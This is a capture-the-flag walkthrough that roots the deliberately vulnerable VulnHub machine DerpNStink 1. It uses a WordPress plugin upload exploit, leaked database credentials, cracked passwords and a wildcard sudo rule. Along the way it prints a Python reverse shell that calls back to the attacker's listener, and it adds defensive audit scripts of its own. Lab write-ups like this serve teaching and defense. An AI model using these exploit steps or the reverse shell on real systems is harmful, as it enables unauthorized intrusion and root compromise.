VulnHub: DerpNStink 1 Walkthrough

DerpNStink 1 is another intentionally vulnerable machine on VulnHub by Bryan Smith.
Enumeration
We start enumeration with AutoRecon.
```
Nmap scan report for 192.168.50.151
Host is up, received arp-response (0.0023s latency).
Scanned at 2021-12-30 19:41:32 EST for 11s
Not shown: 997 closed ports
Reason: 997 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
```
FTP does not allow anonymous login.
We start with port 80.
The landing page looks nice, but there is nothing of interest in its source code. There is a robots.txt too.
```
User-agent: *
Disallow: /php/
Disallow: /temporary/
```
/temporary just says "try harder" and /php is forbidden.
So we have a look at the dirbusting results instead.
```
301    9l   28w   313c http://192.168.50.151/css
200  131l   95w  1298c http://192.168.50.151/index.html
301    9l   28w   320c http://192.168.50.151/javascript
301    9l   28w   312c http://192.168.50.151/js
301    9l   28w   313c http://192.168.50.151/php
200    4l    6w    53c http://192.168.50.151/robots.txt
403   10l   30w   294c http://192.168.50.151/server-status
301    9l   28w   319c http://192.168.50.151/temporary
301    9l   28w   316c http://192.168.50.151/weblog
```
None of these ring a bell except /weblog, which redirects to derpnstink.local.
So we add the following entry to our /etc/hosts file and take it from there.
```
192.168.50.151 derpnstink.local
```
Browsing to http://derpnstink.local/weblog/, we find a blog hosted on WordPress. Interesting!
So we fire up wpscan to enumerate the WordPress site and its plugins.
```
┌──(root💀kali)-[/etc]
└─# wpscan --url http://derpnstink.local/weblog/ --enumerate p
_______________________________________________________________
         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.50.151]
[+] Started: Thu Dec 30 20:34:52 2021
--snip--
[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2021-12-21T06:31:00.000Z
 | [!] The version is out of date, the latest version is 1.7.4.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
```
The site runs the Slideshow Gallery plugin at version 1.4.6, and a quick searchsploit lookup shows that this version is vulnerable to arbitrary file upload.
A little trial and error on /weblog/wp-admin/ shows that admin:admin gives us administrator access to WordPress.
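From the defender's side, the useful lesson from the wpscan output is that the plugin inventory is readable from the outside and that "installed version behind latest" is a mechanical check. The following script is an added example, not part of the original walkthrough or of WPScan itself: it parses the per-plugin block format shown above (the slideshow-gallery entry mirrors the scan; the second plugin entry is constructed) and reports every plugin whose detected version is numerically older than the latest release wpscan reports. Version strings are compared as integer tuples, so 1.10.0 correctly sorts after 1.9.9.

```python
import re

# Constructed excerpt in the format wpscan prints for each detected plugin
# (the slideshow-gallery entry mirrors the scan above; the second entry is
# invented to show a plugin for which no newer version is reported).
SAMPLE_WPSCAN_OUTPUT = """\
[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2021-12-21T06:31:00.000Z
 | [!] The version is out of date, the latest version is 1.7.4.4
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
[+] example-plugin
 | Location: http://derpnstink.local/weblog/wp-content/plugins/example-plugin/
 | Version: 2.0.1 (80% confidence)
"""

PLUGIN_RE = re.compile(r"^\[\+\]\s+(\S+)\s*$")          # "[+] plugin-slug"
LATEST_RE = re.compile(r"latest version is\s+(\S+)")     # newest release wpscan knows
VERSION_RE = re.compile(r"^\s*\|\s*Version:\s+(\S+)")   # detected installed version


def parse_version(text):
    """Turn '1.7.4.4' into (1, 7, 4, 4) so versions compare numerically, not lexically."""
    return tuple(int(part) for part in re.findall(r"\d+", text))


def parse_plugins(output):
    """Return {plugin: {'version': str|None, 'latest': str|None}} from wpscan text."""
    plugins, current = {}, None
    for line in output.splitlines():
        m = PLUGIN_RE.match(line)
        if m:
            current = m.group(1)
            plugins[current] = {"version": None, "latest": None}
            continue
        if current is None:
            continue
        m = LATEST_RE.search(line)
        if m:
            plugins[current]["latest"] = m.group(1)
        m = VERSION_RE.match(line)
        if m:
            plugins[current]["version"] = m.group(1)
    return plugins


def outdated_plugins(output):
    """List (plugin, installed, latest) for every plugin running behind the latest release."""
    findings = []
    for name, info in parse_plugins(output).items():
        if info["version"] and info["latest"]:
            if parse_version(info["version"]) < parse_version(info["latest"]):
                findings.append((name, info["version"], info["latest"]))
    return findings


if __name__ == "__main__":
    for name, installed, latest in outdated_plugins(SAMPLE_WPSCAN_OUTPUT):
        print(f"{name}: installed {installed}, latest {latest}")
```

Feeding it a saved scan (`wpscan ... --enumerate p > scan.txt`) and diffing the result against the previous run is a cheap way to notice when a site has fallen behind on plugin updates before someone else does.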
Initial Foothold
We are going to use Metasploit to exploit the vulnerability in the Slideshow Gallery plugin; alternatively, there is a Python script on Exploit-DB that does the same thing manually.
```
msf6 > use exploit/unix/webapp/wp_slideshowgallery_upload
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set RHOSTS http://derpnstink.local/weblog/
RHOSTS => http://derpnstink.local/weblog/
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set WP_USER admin
WP_USER => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set WP_PASSWORD admin
WP_PASSWORD => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
```
Make sure LHOST and LPORT are set correctly before running exploit.
```
meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@DeRPnStiNK:/home$ whoami
www-data
```
We now have a low privileged shell as www-data.
Lateral Movement
We enumerate manually first: cron jobs, binaries with the SUID bit or sudo permissions, whether /etc/passwd is writable, and any other files that look interesting. Nothing turns up, so we fetch linpeas.sh from our machine and run it.
The kernel and Ubuntu version were flagged, but the suggested exploits did not work.
So we skim through the voluminous linpeas output and come across database credentials.
```
╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 www-data root 3123 Nov 11  2017 /var/www/html/weblog/wp-config.php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');
```
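Three things in that linpeas hit are each a finding on their own: WordPress connects as the MySQL root account, the password is the name of the service, and the file is world-readable (-rw-r--r--), so any local account, not just www-data, can read it. The script below is an added example written for this walkthrough, not code from the original post or from WordPress; it pulls the string-valued define() constants out of a wp-config.php (the sample is constructed to mirror the lines above) and reports exactly those three weaknesses. The file mode is passed in as an integer, as you would get from os.stat(path).st_mode & 0o777.

```python
import re

# Constructed sample mirroring the four defines linpeas surfaced above
# (the WP_DEBUG line is added to show that non-string defines are ignored).
SAMPLE_WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');
define('WP_DEBUG', false);
"""

# define('NAME', 'value') with either quote style; only string values are captured.
DEFINE_RE = re.compile(r"""define\(\s*['"]([A-Z_]+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")

# Constructed deny-list of passwords that are obviously guessable for a DB account.
WEAK_PASSWORDS = {"", "mysql", "root", "password", "wordpress", "admin"}


def parse_defines(source):
    """Return {constant: value} for every string-valued define() in a wp-config.php."""
    return dict(DEFINE_RE.findall(source))


def audit_wp_config(source, mode):
    """Return a list of findings for the config text and its file mode (e.g. 0o644)."""
    cfg = parse_defines(source)
    findings = []
    if cfg.get("DB_USER") == "root":
        findings.append("DB_USER is root: use a dedicated MySQL account with rights on the WordPress database only")
    password = cfg.get("DB_PASSWORD", "")
    if password.lower() in WEAK_PASSWORDS or len(password) < 12:
        findings.append("DB_PASSWORD is empty, trivial or shorter than 12 characters")
    if mode & 0o004:
        findings.append("wp-config.php is world-readable; any local account can read the database credentials")
    return findings


if __name__ == "__main__":
    # 0o644 is the mode linpeas reported for the file above (-rw-r--r--).
    for finding in audit_wp_config(SAMPLE_WP_CONFIG, mode=0o644):
        print("[!]", finding)
```

The fix on a real host is the mirror image of the findings: a per-site MySQL user granted only on the WordPress database, a long random password, and wp-config.php owned by root with group www-data and mode 0640 so the web server can read it but other local users cannot.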
We use the newly acquired credentials to access the database.
```
www-data@DeRPnStiNK:/tmp$ mysql -u root -p mysql
Enter password: mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 119
Server version: 5.5.58-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
```
We now have access to the database.
```
mysql> show database;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| wordpress          |
+--------------------+
mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_wordpress        |
+----------------------------+
| wp_commentmeta             |
| wp_comments                |
| wp_gallery_galleries       |
| wp_gallery_galleriesslides |
| wp_gallery_slides          |
| wp_links                   |
| wp_options                 |
| wp_postmeta                |
| wp_posts                   |
| wp_term_relationships      |
| wp_term_taxonomy           |
| wp_termmeta                |
| wp_terms                   |
| wp_usermeta                |
| wp_users                   |
+----------------------------+
15 rows in set (0.00 sec)
```
wp_users should be interesting.

It holds the password hashes of the users unclestinky and admin.
We run them through an online cracker: no hit for admin, but unclestinky's password is wedgie57.
```
www-data@DeRPnStiNK:/$ su stinky
Password: wedgie57
stinky@DeRPnStiNK:/$
```
We are now Uncle Stinky.
```
stinky@DeRPnStiNK:~/Documents$ ls
derpissues.pcap
stinky@DeRPnStiNK:~/Documents$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.50.129 - - [31/Dec/2021 02:14:30] "GET /derpissues.pcap HTTP/1.1" 200 -
```
A little more enumeration turns up a packet capture in stinky's Documents folder, so we serve it with Python's SimpleHTTPServer, pull it to our machine and analyse it in Wireshark.

We find mrderp's password in the capture: derpderpderpderpderpderpderp.
```
www-data@DeRPnStiNK:/$ su mrderp
Password: derpderpderpderpderpderpderp
mrderp@DeRPnStiNK:
```
We are now MrDerp.
```
mrderp@DeRPnStiNK:/$ sudo -l
[sudo] password for mrderp: derpderpderpderpderpderpderp
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
```
Checking the sudo permissions, we can run as root any binary under /home/mrderp/binaries/ whose name starts with derpy; the extension does not matter. The rule is fatal twice over: the path is a glob, and the directory sits inside mrderp's own home, so the user decides what gets executed.
So we save the following code as derpy.py in the binaries directory. There is no binaries directory yet, so we create it.
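Both properties of that rule can be caught mechanically when reviewing sudoers or `sudo -l` output. The script below is an added example for this walkthrough, not part of the original post or of sudo; it parses the rule section of a `sudo -l` transcript (the constructed sample reuses the rule above and adds a well-scoped rule for contrast) and flags any command whose path contains glob metacharacters, is the keyword ALL, or lives under the calling user's own home directory.

```python
import re

# Constructed `sudo -l` transcript: the first rule is the one found above, the
# second is invented as a tightly scoped rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
    (root) NOPASSWD: /usr/bin/systemctl restart apache2
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands")
# "(runas) [TAG: ...] command": runas spec in parentheses, optional upper-case
# tags such as NOPASSWD:, then the command line itself.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(output):
    """Return (user, [(runas, tags, command), ...]) from `sudo -l` text."""
    user, rules, in_rules = None, [], False
    for line in output.splitlines():
        m = USER_RE.match(line)
        if m:
            user, in_rules = m.group(1), True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            runas, tags, command = m.groups()
            rules.append((runas, tags.strip(), command))
    return user, rules


def audit_sudo_l(output):
    """Flag rules whose command the user can shape: ALL, globs, or paths under the user's home."""
    user, rules = parse_sudo_l(output)
    findings = []
    for runas, tags, command in rules:
        if command == "ALL":
            findings.append((command, "unrestricted command"))
            continue
        path = command.split()[0]
        if any(ch in path for ch in "*?["):
            findings.append((command, "wildcard in command path"))
        if user and path.startswith(f"/home/{user}/"):
            findings.append((command, "command lives under the user's own home directory"))
    return findings


if __name__ == "__main__":
    for command, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"[!] {command}: {reason}")
```

The safe shape of a rule is the second one in the sample: an absolute path to a root-owned binary outside any user-writable directory, with the arguments pinned down. Running the audit over `sudo -l -U <user>` output for every account is a quick way to find rules like the derpy* one before a red team does.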
```python
#!/usr/bin/python
# Python 2 reverse shell: connects back to our listener on 192.168.50.129:444,
# wires stdin/stdout/stderr to the socket and hands over an interactive /bin/sh.
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.50.129", 444))
os.dup2(s.fileno(), 0)  # stdin
os.dup2(s.fileno(), 1)  # stdout
os.dup2(s.fileno(), 2)  # stderr
p = subprocess.call(["/bin/sh", "-i"])
```
Make the file executable and call it with sudo while a listener is waiting on our machine.
```
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.py
[sudo] password for mrderp: derpderpderpderpderpderpderp
```
At the listener, we shall receive a shell.
```
┌──(root💀kali)-[/home/kali/Downloads]
└─# nc -nlvp 444
listening on [any] 444 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.151] 52000
# whoami
root
```
Voila! We got root access.
```
# cd Desktop
# ls
flag.txt
# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
```
And there goes our root flag.
Thanks for reading.